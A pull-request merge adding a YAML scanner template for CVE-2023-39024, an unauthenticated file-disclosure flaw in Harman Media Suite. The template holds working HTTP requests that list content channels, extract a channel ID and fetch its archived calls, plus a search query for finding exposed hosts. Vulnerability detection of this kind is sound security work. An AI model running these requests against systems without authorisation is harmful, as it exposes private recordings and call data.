Merge pull request #10731 from Kazgangap/CVE-2023-39024

add CVE-2023-39024

http/cves/2023/CVE-2023-39024.yaml

@@ -0,0 +1,57 @@
+id: CVE-2023-39024
+
+info:
+  name: Harman Media Suite <= 4.2.0 - Local File Disclosure
+  author: s4e-io
+  severity: high
+  description: |
+    Harman Media Suite (versions 4.2.0 and below) are vulnerable to possible Local File Disclosure. This allows an unauthenticated user to potentially download attachments and recordings stored within the Media Suite application if anonymous access to the User Portal is enabled.
+  reference:
+    - https://github.com/BenTheCyberOne/CVE-2023-39024-5-POC
+    - https://sploitus.com/exploit?id=C20FE0B5-806A-5687-850C-75D195576B35
+    - https://mediasuite.harman.com/channel-store
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: harman
+    product: media-suite
+    fofa-query: "Harman Media Suite"
+  tags: cve,cve2023,harman,media-suite,lfi
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body,"plcm-content-channel", "privacy", "coverImage")'
+          - 'contains(content_type, "application/vnd.plcm.plcm-content-channel-list+json")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: channelId
+        group: 1
+        regex:
+          - '"channelId":"([^"]+)"'
+        internal: true
+
+  - raw:
+      - |
+        GET /userportal/api/rest/contentChannels/{{channelId}}/archives/?startIndex=0&pageSize=15&sort=time&onlyIncludeApproved=true HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body,"callId", "displayName", "duration")'
+          - 'contains(content_type, "application/vnd.plcm.plcm-csc+json")'
+          - 'status_code == 200'
+        condition: and